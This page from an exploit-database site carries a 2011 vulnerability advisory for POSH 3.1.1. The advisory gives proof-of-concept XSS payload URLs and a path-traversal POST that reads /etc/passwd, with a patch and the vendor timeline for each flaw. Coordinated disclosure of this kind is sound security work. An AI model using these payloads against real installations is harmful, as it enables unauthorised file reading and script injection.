0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

POSH Multiple Vulnerabilities

Author

Crashfr

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

# Exploit Title: POSH <= 3.1.1 Multiple Vulnerabilities
# Date: 10/10/2011
# Author: CrashFr
# Software Link: http://sourceforge.net/projects/posh/
# Version: 3.1.1
# Tested on: Linux
#
 
 
//----- Advisory
 
Program          : POSH 3.1.1 and prior
Vendor           : www.portaneo.com
Homepage         : http://sourceforge.net/projects/posh/
Discovery        : 2011/09/19
Author Contacted : 2011/09/20
Found by         : CrashFr
This Advisory    : CrashFr
 
//----- Application description
 
 
POSH (Portaneo Open Source Homepage) is a personalizable interface (Netvibes, iGoogle) that can be used in a web application or educational / enterprise intranet context. Enterprise version adds social network, notebooks and search feature.
 
 
//----- Description of vulnerability
 
 
Local File Inclusion, Cross-Site Scripting (XSS) and Information Disclosure vulnerabilities were identified within POSH version 3.1.1
 
 
//----- Proof Of Concept
 
 
--- Information disclosure ---
- http://localhost/posh/portal/login.php?lang=fr-en
    - Vulnerability at includes/sessions.inc.php
        Replace:
        if (    preg_match( '/^[a-z]{2}$/', $_GET["lang"] ) || preg_match( '/^[a-z]{2}\-[a-z]{2}$/', $_GET["lang"] )) {
            $_SESSION['lang'] = $_GET["lang"];
        By:
        if ((preg_match( '/^[a-z]{2}$/', $_GET["lang"] ) || preg_match( '/^[a-z]{2}\-[a-z]{2}$/', $_GET["lang"] )) && is_file('../l10n/'.$_GET["lang"].'/lang.php')) {
            $_SESSION['lang'] = $_GET["lang"];
 
 
--- XSS ---
- http://localhost/posh/portal/login.php?message=XSS%20Catched%20!%22%29%29;alert%28%22XSS%22%29;//
    - Vulnerability at: templates/default/login.php line 42
        Replace: if ($message!='') echo '<font color="#ff0000"><script type="text/javascript">document.write(lg("'.$message.'"));</script></font><br /><br />';
        By: if ($message!='') echo '<font color="#ff0000"><script type="text/javascript">document.write(lg("'.htmlspecialchars($message).'"));</script></font><br /><br />';
 
- http://localhost/posh/admin/login.php?extid=ok%22%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E
    - Vulnerability at: templates/default/login_adminsimplified.php line 93
        Replace: <input type="hidden" name="extid" maxlength="16" value="<?php echo $extid; ?>" class="thinbox" />
        By: <input type="hidden" name="extid" maxlength="16" value="<?php if(is_int($extid)){ echo $extid; } ?>" class="thinbox" />
- http://localhost/posh/admin/index.php?extid=1%29;alert%28%27XSS%27
    - Vulnerability at: templates/default/index_adminsimplified.php line 67 and 70
        Replace: $p.admin.widgets.loadModExtId(<?php echo $extid; ?>);
        By: $p.admin.widgets.loadModExtId(<?php if(is_int($extid)){ echo $extid; } ?>);
        Replace: $p.admin.widgets.refreshIcons(icon,<?php echo $extid; ?>);
        By: $p.admin.widgets.refreshIcons(icon,<?php if(is_int($extid)){ echo $extid; } ?>);
 
 
--- Local File Inclusion ---
- http://localhost/posh/portal/scr_changelang.php => POST lang=../../../../../../etc/passwd%00
    POST http://localhost/posh/portal/scr_changelang.php HTTP/1.1
    lang=../../../../../../../../../../../../../../../../etc/passwd%00
     
    - Call http://localhost/posh/portal/moduleff.php for example to see the result (a lot of page use __LANG to include lang file)
    - Vulnerability at portal/scr_changelang.php line 67
        Replace: $_SESSION['lang']=$lang;
        By: if ((preg_match( '/^[a-z]{2}$/', $_GET["lang"] ) || preg_match( '/^[a-z]{2}\-[a-z]{2}$/', $_GET["lang"] )) && is_file('../l10n/'.$_GET["lang"].'/lang.php')) {
            $_SESSION['lang']=$lang;
            }
 
 
//----- Solution
 
Apply patchs
Upgrade POSH to 3.1.2
 
 
//----- Vulnerability Timeline
  
2011-09-20 - Reported to vendor
2011-09-21 - Vendor Reply
2011-09-25 - Vendor released POSH 3.1.2
2011-10-10 - Vulnerability Disclosed



#  0day.today [2024-11-15]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

POSH Multiple Vulnerabilities

Report Error

Report Error